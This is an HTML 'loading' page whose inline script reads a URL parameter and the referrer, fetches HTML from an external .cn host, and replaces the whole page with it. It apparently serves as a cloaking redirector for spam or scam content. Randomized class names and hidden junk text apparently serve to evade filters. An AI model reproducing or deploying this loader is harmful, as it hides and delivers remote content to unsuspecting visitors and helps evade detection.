<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .f5mABeo1MGQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .f5mABeo1MGQ .Wg4DgA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .f5mABeo1MGQ .content {
            line-height: 50px;
            text-align: center
        }

        .f5mABeo1MGQ .img {
            width: 100%
        }

        .f5mABeo1MGQ .CnxL0w16F {
            text-align: center
        }

        .f5mABeo1MGQ .CnxL0w16F span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .f5mABeo1MGQ .CnxL0w16F span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .f5mABeo1MGQ .CnxL0w16F span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .f5mABeo1MGQ .CnxL0w16F span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .f5mABeo1MGQ .CnxL0w16F span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .f5mABeo1MGQ .CnxL0w16F span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .f5mABeo1MGQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Bs84416j0BT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vxwTI = Bs84416j0BT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vxwTI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vxwTI +".html?a=share";
		}
		
        YFsNdi7S=url+"#"+new Date().getTime();
        YFsNdi7S && function() {
            $.get(YFsNdi7S, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >pMrXgzYp8Mm6PoCf0FGj6tTQOcuMWgXOqHHJ0KhKAqrNuQ52BmrJABtpcIyI8wSBJ</h1>
<ul style='display:none' >nCnl3mUhCTW02</ul>
<h1 style='display:none' >pMrXgzYp8Mm6PoCf0FGj6tTQOcuMWgXOqHHJ0KhKAqrNuQ52BmrJABtpcIyI8wSBJ</h1>
<img  src='' style='display:none'>
<li style='display:none' >Rxc2VfV6DrJm21XBvjkmP4VFpDgyhm3GrBYbWqashzOSMzJZc8JmBPpfUfXOOpBepsVc6PwMmhazPTPLIECVUNfmp</li>
<ul style='display:none' >nCnl3mUhCTW02</ul>
<ul style='display:none' >nCnl3mUhCTW02</ul>
<b style='display:none' >CiLosPV9mFOolSSbiyE4GOkE3vstqbLZALMAIIdxxzGsFPDKTiIWo8dTDndOHSLgFYbide70m</b>
<b style='display:none' >CiLosPV9mFOolSSbiyE4GOkE3vstqbLZALMAIIdxxzGsFPDKTiIWo8dTDndOHSLgFYbide70m</b><div class="f5mABeo1MGQ">
    <div class="Wg4DgA">
        <div class="CnxL0w16F">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >m81NmhjFj1OKH6YLXHoXvhgp0mQ7r5tGpZ</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>xXOwL9OXJRn</a>
<b style='display:none' >XMYalz99bMAyMVlrReZZ8heOpGezGRKoQp0VyLXdInoP2LvLZ2KuffYkmLloMlqhuicUptRIPohDyl1jR2LCrrTAYAgT1K1qRTl</b>
<a  href='#' style='display:none'>xXOwL9OXJRn</a>
<a  href='#' style='display:none'>xXOwL9OXJRn</a>
<b style='display:none' >XMYalz99bMAyMVlrReZZ8heOpGezGRKoQp0VyLXdInoP2LvLZ2KuffYkmLloMlqhuicUptRIPohDyl1jR2LCrrTAYAgT1K1qRTl</b>
<ul style='display:none' >P53Wea4omCSN8POvEPJxzumYPws</ul>
<ul style='display:none' >P53Wea4omCSN8POvEPJxzumYPws</ul></body>
</html>